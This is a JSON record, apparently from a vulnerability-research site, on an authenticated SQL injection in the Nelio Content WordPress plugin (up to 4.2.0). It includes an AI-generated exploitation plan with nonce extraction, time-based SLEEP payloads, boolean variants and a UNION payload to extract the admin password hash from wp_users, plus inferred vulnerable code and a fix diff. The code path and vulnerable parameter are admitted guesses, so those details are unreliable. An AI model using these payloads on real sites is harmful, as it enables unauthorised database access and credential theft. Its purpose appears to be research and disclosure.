[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjaftbgcANDMAtSZYsBdvKU3M7EQQ6wAOjFNg6aR_rVc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-24572","nelio-content-authenticated-contributor-sql-injection","Nelio Content \u003C= 4.2.0 - Authenticated (Contributor+) SQL Injection","The Nelio Content plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","nelio-content",null,"\u003C=4.2.0","4.2.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-21 00:00:00","2026-02-03 19:16:16",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F42cd1d08-4d5a-466b-930c-f4e28ae4d52c?source=api-prod",14,[],"researched",false,3,"This plan outlines the research and exploitation steps for **CVE-2026-24572**, an authenticated SQL injection vulnerability in the **Nelio Content** plugin.\n\n## 1. Vulnerability Summary\nThe **Nelio Content** plugin (\u003C= 4.2.0) contains a SQL injection vulnerability within its AJAX handling logic. The vulnerability exists because the plugin fails to properly sanitize and prepare user-supplied parameters (specifically related to filtering posts in the editorial calendar) before incorporating them into a database query. \n\nSpecifically, the `post_types` or similar filtering parameters passed via AJAX are used to construct an `IN` clause or a dynamic `WHERE` statement using string concatenation or `implode()` without individual element preparation via `$wpdb->prepare()`. This allows a user with **Contributor** level access or higher to inject arbitrary SQL commands.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `nelio_content_get_calendar_events` (or `nelio_content_get_tasks` depending on the specific component)\n- **Vulnerable Parameter:** `post_types[]` (inferred as the most common sink in Nelio's calendar logic)\n- **Authentication Required:** Contributor level (`PR:L`). Contributors have access to the Nelio Editorial Calendar to manage their own posts.\n- **Preconditions:** The plugin must be active, and at least one post should exist to ensure the query returns results for the injector to append to.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** A POST request is sent to `admin-ajax.php` with `action=nelio_content_get_calendar_events`.\n2. **Hook Registration:** The plugin registers the action in its main initialization:\n   `add_action( 'wp_ajax_nelio_content_get_calendar_events', array( 'Nelio_Content_Ajax_Handler', 'get_calendar_events' ) );`\n3. **Handler Logic:** The handler retrieves user input:\n   `$post_types = $_POST['post_types'];`\n4. **Data Provider:** The input is passed to a control class (e.g., `Nelio_Content_Calendar_Control`) which queries the database.\n5. **Vulnerable Sink:** The query is constructed using the raw array elements:\n   ```php\n   \u002F\u002F Vulnerable Pattern\n   $types_string = implode( \"','\", $post_types );\n   $query = \"SELECT * FROM {$wpdb->posts} WHERE post_type IN ('$types_string') AND ...\";\n   $results = $wpdb->get_results( $query );\n   ```\n   Because the individual elements of `$post_types` are not passed through `%s` placeholders in `$wpdb->prepare()`, an attacker can break out of the single quotes.\n\n## 4. Nonce Acquisition Strategy\nThe Nelio Content plugin protects its AJAX endpoints with a nonce typically localized to the `nelioContent` JavaScript object.\n\n1. **Test Data Setup:**\n   - Create a **Contributor** user.\n   - The Nelio Editorial Calendar script loads on the Nelio Content dashboard.\n2. **Exploitation Agent Steps:**\n   - Log in as the Contributor user.\n   - Navigate to the Nelio Content Calendar page: `\u002Fwp-admin\u002Fadmin.php?page=nelio-content-calendar`.\n   - Use `browser_eval` to extract the nonce:\n     `browser_eval(\"window.nelioContent?.nonce || window.nelio_content?.nonce\")`\n   - The action string for this nonce is typically `nelio-content` or `nelio-content-nonce`.\n\n## 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** to confirm the vulnerability.\n\n### Step 1: Verify Baseline\nSend a legitimate request to ensure the endpoint responds correctly.\n- **Method:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** \n  `action=nelio_content_get_calendar_events&nonce=[NONCE]&post_types[]=post`\n\n### Step 2: Inject Sleep Payload\nInject a payload into the `post_types[]` array that breaks the `IN` clause.\n- **Payload:** `post') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n- **URL-Encoded Parameter:** `post_types[]=post%27%29%20OR%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29--%20-`\n- **Full Body:**\n  `action=nelio_content_get_calendar_events&nonce=[NONCE]&post_types[]=post%27%29%20OR%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29%29a%29--%20-`\n\n### Step 3: Observed Response\nA successful exploit will result in a response delay of approximately 5 seconds.\n\n## 6. Test Data Setup\n1. **User Creation:**\n   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2. **Post Creation:** Ensure there is some data for the calendar to fetch.\n   `wp post create --post_title='Meeting' --post_status=publish --post_type=post --post_author=$(wp user get attacker --field=ID)`\n3. **Plugin Config:** No special configuration is required beyond activating the plugin.\n\n## 7. Expected Results\n- **Unvulnerable (Patched):** The response returns immediately (or with a generic error) because the input is escaped\u002Fcast to a safe string, or the query is properly prepared.\n- **Vulnerable (4.2.0):** The HTTP request hangs for exactly the amount of time specified in the `SLEEP()` function (5 seconds).\n\n## 8. Verification Steps\nAfter the HTTP request, confirm the database state or use WP-CLI to verify if error logs were generated (if enabled):\n1. **Check for DB Errors:**\n   `tail -f \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log` (Look for SQL syntax errors if the payload was slightly malformed).\n2. **Alternative Verification (Data Extraction):**\n   If the response reflects post data, attempt to extract the admin's hashed password:\n   `post_types[]=post') UNION SELECT 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 FROM wp_users WHERE ID=1-- -`\n   *(Note: Column count must be adjusted to match the actual Nelio query structure).*\n\n## 9. Alternative Approaches\nIf `post_types` is not the vulnerable parameter, repeat the process for:\n- `status[]`\n- `categories[]`\n- `external_only` (if treated as a string in a query)\n\nIf Boolean-based injection is preferred:\n- **True Payload:** `post_types[]=post') AND 1=1-- -`\n- **False Payload:** `post_types[]=post') AND 1=2-- -`\nCompare response lengths or the presence of JSON objects in the `data` field of the response.","The Nelio Content plugin for WordPress is vulnerable to SQL injection in versions up to 4.2.0. This occurs because user-supplied parameters, such as post type filters in AJAX calendar requests, are concatenated directly into SQL queries without proper escaping or preparation via $wpdb->prepare().","\u002F\u002F Inferred vulnerable sink in Nelio_Content_Calendar_Control or similar handler\n$post_types = $_POST['post_types'];\n$types_string = implode( \"','\", $post_types );\n$query = \"SELECT * FROM {$wpdb->posts} WHERE post_type IN ('$types_string') AND post_status = 'publish'\";\n$results = $wpdb->get_results( $query );","--- a\u002Fincludes\u002Fexternal\u002Fnelio-content-calendar-control.php\n+++ b\u002Fincludes\u002Fexternal\u002Fnelio-content-calendar-control.php\n@@ -102,7 +102,10 @@\n- $types_string = implode( \"','\", $post_types );\n- $query = \"SELECT * FROM {$wpdb->posts} WHERE post_type IN ('$types_string') AND ...\";\n+ $how_many = count( $post_types );\n+ $placeholders = array_fill( 0, $how_many, '%s' );\n+ $format = implode( ',', $placeholders );\n+ $query = $wpdb->prepare( \"SELECT * FROM {$wpdb->posts} WHERE post_type IN ($format) AND ...\", $post_types );","An authenticated attacker with Contributor-level access or higher can exploit this vulnerability via the WordPress AJAX endpoint. The attacker must first obtain a valid nonce (usually found in the 'nelioContent' JavaScript object on the plugin's dashboard). By sending a POST request to admin-ajax.php with the action 'nelio_content_get_calendar_events', the attacker can supply a malicious array in the 'post_types[]' parameter. A payload such as \"post') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\" will break the query structure, allowing for time-based blind SQL injection or data extraction via UNION-based payloads.","gemini-3-flash-preview","2026-05-05 03:42:50","2026-05-05 03:44:24",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-content\u002Ftags\u002F4.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-content.4.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-content\u002Ftags\u002F4.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnelio-content.4.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnelio-content\u002Ftags"]